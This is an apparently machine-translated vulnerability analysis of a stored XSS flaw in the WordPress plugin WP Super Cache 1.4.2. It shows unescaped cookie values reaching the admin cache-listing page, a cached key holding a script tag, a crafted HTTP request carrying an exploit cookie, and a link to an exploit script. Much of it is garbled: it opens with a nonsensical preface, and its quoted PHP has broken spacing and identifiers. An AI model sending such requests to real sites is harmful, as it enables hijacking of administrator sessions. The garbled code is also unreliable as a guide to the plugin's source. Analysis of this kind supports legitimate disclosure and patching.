WP Super Cache <= 1.4.2 stored XSS vulnerability analysis
Preface
The peak is the peak of the city.
At that moment, it seems like at this moment, there are many good people, and tree and grass fall in love, remember to stay away from yesterday!
The basic info. WP Super Cache static files that have not been cached and writes html files to the wp-contents/cache directory. A key is generated for a wordpress user (anonymous comment, author, Administrator, etc.). The key part is taken from the user cookie accessing the current page and the corresponding cache file is found based on the key. The plug-in background display page lists all cached files and keys. Because the key is not filtered, the plug-in background has the storage xss vulnerability. Trigger address: http: // 127.0.0.1/cms/wordpress/wp-admin/options-general.php? Page = wpsupercache & tab = contents & listfiles = 1 & _ wpnonce = b468360c30 # listfiles trigger: the code analysis plug-in hooks all pages to call the wp_super_cache_init function to initialize the plug-in. File: wp-super-cache.1.4.2 \ wp-cache-phase1.php line: 107
function wp_super_cache_init() { ....... get_wp_cache_key()}
Get_wp_cache_key () call wp_cache_get_cookies_values file: wp-super-cache.1.4.2 \ wp-cache-phase1.php line: 360
Function wp_cache_get_cookies_values () {$ string = ''; $ regex ="/^ wp-postpass | ^ comment_author _ "; // No need to register for a comment. If (defined ('logged _ IN_COOKIE ') $ regex. = "| ^ ". preg_quote (constant ('logged _ IN_COOKIE '); else $ regex. = "| ^ wordpress_logged_in _"; // Common Logon user $ regex. = "/"; while ($ key = key ($ _ COOKIE) {if (preg_match ($ regex, $ key )) {if (isset ($ GLOBALS ['wp _ super_cache_debug ']) & $ GLOBALS ['wp _ super_cache_debug']) wp_cache_debug ("Usage: $ regex Cookie detected: $ key ", 5); $ string. = $ _ COOKIE [$ key]. ","; // directly retrieve the cookie without filtering} next ($ _ COOKIE);} reset ($ _ COOKIE); // If you use this hook, make sure you update your. htaccess rules with the same conditions $ string = do_cacheaction ('wp _ cache_get_cookies_values ', $ string); return $ string ;}
Check whether information such as cookies has been cached and written to wp-content \ cache \ meta directory such as file: wp-cache-94bbb0fe53ee08e617bce3f2d58f264f.meta
a:5:{s:7:"headers";a:4:{s:4:"Vary";s:12:"Vary: Cookie";s:12:"Content-Type";s:38:"Content-Type: text/html; charset=UTF-8";s:10:"X-Pingback";s:53:"X-Pingback: http://127.0.0.1/cms/wordpress/xmlrpc.php";s:13:"Last-Modified";s:44:"Last-Modified: Fri, 10 Apr 2015 06:08:45 GMT";}s:3:"uri";s:24:"127.0.0.1/cms/wordpress/";s:7:"blog_id";i:1;s:4:"post";i:0;s:3:"key";s:78:"127.0.0.180/cms/wordpress/<script>alert(0)</script>,x@baidu.com,http://2222,";}
Background display page WP Super Cache settings> content, key code.
File: wp-super-cache.1.4.2 \ wp-cache.php line: 2347 ksort ($ cached_list); // cache file list, read from wp-contents/cache folder. Foreach ($ cached_list as $ age => $ d) {foreach ($ d as $ details) {echo "<tr $ bg> <td> $ c </td> <a href = 'HTTP: // {$ details ['url']} '> ". $ details ['uri ']. "</a> </td> <td> ". str_replace ($ details ['url'], '', $ details ['key']). "</td> <td >{$ age} </td> <a href = '". wp_nonce_url (add_query_arg (array ('page' => 'psupercache', 'Action' => 'deletepcache', 'url' => base64_encode ($ details [ 'Uri ']), 'wp-cache '). "# listfiles '> X </a> </td> </tr> \ n"; $ flip =! $ Flip; $ c ++ ;}}
The variable $ details ['key'] is from a file in wp-content \ cache \ meta and is directly output without any filtering. The above analysis shows the vulnerability utilization. Send the following packets to generate a new cache and insert malicious scripts. GET/cms/wordpress/HTTP/1.1 Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 37.0) Gecko/20100101 Firefox/37.0 Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8Accept-Language: zh-CN, zh; q = 0.8, en-US; q = 0.5, en; q = 0.3Accept-Encoding: gzip, deflateCookie: comment_author_url _ {randstr }={ poc} {randstr} Connection: keep-alive simple exploit: https://github.com/yaseng/pentest/blob/master/exploit/wp-super-cache-xss-exploit.py